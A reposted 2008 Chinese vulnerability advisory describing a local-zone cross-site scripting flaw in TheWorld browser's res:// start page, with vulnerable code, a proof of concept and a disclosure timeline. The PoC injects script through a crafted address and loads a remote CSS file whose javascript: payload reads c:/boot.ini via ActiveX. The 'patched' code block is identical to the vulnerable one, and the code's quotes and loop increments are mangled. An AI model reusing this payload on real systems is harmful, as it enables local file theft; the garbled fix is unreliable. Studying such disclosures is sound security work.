世界之窗等浏览器本地xss跨域漏洞POC _漏洞分析

漏洞说明：http://www.80sec.com/360-sec-browser-localzone-xss.html

　　文档来源:http://www.80sec.com/release/the-world-browser-locale-zone-xss-poc.txt

　　漏洞分析：世界之窗浏览器在起始页面是以res://e:\progra~1\thewor~1.0\languages\chs.dll/twhome.htm的形式来处理的，而由于缺乏对res协议安全的必要控制，导致页面的权限很高，而该页面中存在的一个xss问题将导致本地跨域漏洞，简单分析如下：

<script language="javascript">
var noldcount = 0;
for( i = 0; i < g_ncountold; i )
{
str_url = g_arr_argurlold[i];
str_name = g_arr_argnameold[i];
str_td = “<tr id=’twolditem” i ”‘><td valign=’top’ width=’64′><div align=’right’><a style=’cursor:hand’ title=’删除当前项’ onclick=\”javascript:tw_deleteitemold(’” i ”‘);\”>” “<img border=’0′ src=’twpage_delete.gif’ width=’16′ height=’16′></div></a></td>”;
document.write( str_td );
str_td = “<td><a target=’_blank’ href=’” str_url “‘>” str_name “</a></td></tr>”;
document.write( str_td );
noldcount = i;
g_bhaslasturl = true;
}
</script>

　　str_name和str_url不经过滤地直接输出，由于该页面处于本地安全区域，所以拥有很高的权限，可以做很多跨域操作，包括读取文件和运行本地程序。

　　漏洞修补：

<script language="javascript">
var noldcount = 0;
for( i = 0; i < g_ncountold; i )
{
str_url = g_arr_argurlold[i];
str_name = g_arr_argnameold[i];
str_td = “<tr id=’twolditem” i ”‘><td valign=’top’ width=’64′><div align=’right’><a style=’cursor:hand’ title=’删除当前项’ onclick=\”javascript:tw_deleteitemold(’” i ”‘);\”>” “<img border=’0′ src=’twpage_delete.gif’ width=’16′ height=’16′></div></a></td>”;
document.write( str_td );
str_td = “<td><a target=’_blank’ href=’” str_url “‘>” str_name “</a></td></tr>”;
document.write( str_td );
noldcount = i;
g_bhaslasturl = true;
}
</script>

　　已经用js控制dom显示了

　　漏洞演示：这里提供测试方法可以读取c:/boot.ini

　　1 打开如下地址

sc:h’><script>alert(document.write(unescape(””)))</script>

　　2 上面将导致一个不可访问的页面，然后直接关闭tw浏览器( 没有好的办法crash)

　　3 重新打开tw浏览器，可以发现http://www.80sec.com/1.css中的内容被解析，并且有本地域的权限。

　　1.css内容，换成其他js代码一样执行

body {
background-image: url('javascript:alert(document.location);xmlhttp=new activexobject("msxml2.xmlhttp.3.0");xmlhttp.open("get","c:/boot.ini",false);xmlhttp.send();alert(xmlhttp.responsetext);')
}

　　漏洞状态：

　　2008-06-24通知厂商

　　2008-06-25修补

　　http://www.ioage.com/cnnew/uplog.htm

AOL Radio MediaPlaybackControl 控件栈溢出漏洞

AOL Radio MediaPlaybackControl 控件栈溢出漏洞受影响系统： AOL AmpX.dll 2.6.1.11 不受影响系统： AOL... [阅读全文]

入侵检测系统漏洞的分析

入侵检测系统漏洞的分析本文针对入侵检测系统的漏洞来了解一下黑客的入侵手法。一旦安装了网络入侵检测系统，网络入侵检测系统就会为你分析出网上出现的黑客攻击事件，... [阅读全文]

2007年12月网络安全漏洞总结

2007年12月网络安全漏洞总结　声明：本十大安全漏洞由NSFOCUS安全小组根据安全漏洞的严重程度、影响范围等因素综合评出，仅供参考　　1.2007-12... [阅读全文]

Oblog最新注入漏洞分析(已修补)

Oblog最新注入漏洞分析(已修补) Date：2008-5-15 Author：Yamato[BCT] Version：Oblog 4.5-4.6 sql ... [阅读全文]

OmniPCX Enterprise存在远程命令注入漏洞

OmniPCX Enterprise存在远程命令注入漏洞受影响系统： Alcatel-Lucent OmniPCX Enterprise <= 7.... [阅读全文]

Discuz!!论坛wap功能模块编码的注射漏洞分析

Discuz!!论坛wap功能模块编码的注射漏洞分析发布时间:2008-08-04 SBEUGID:SEBUGV2008083778 影响版本: Discu... [阅读全文]


验证码：

验证码：

世界之窗等浏览器本地xss跨域漏洞POC

2008年10月08日 • 漏洞分析 •我要评论

相关文章:

发表评论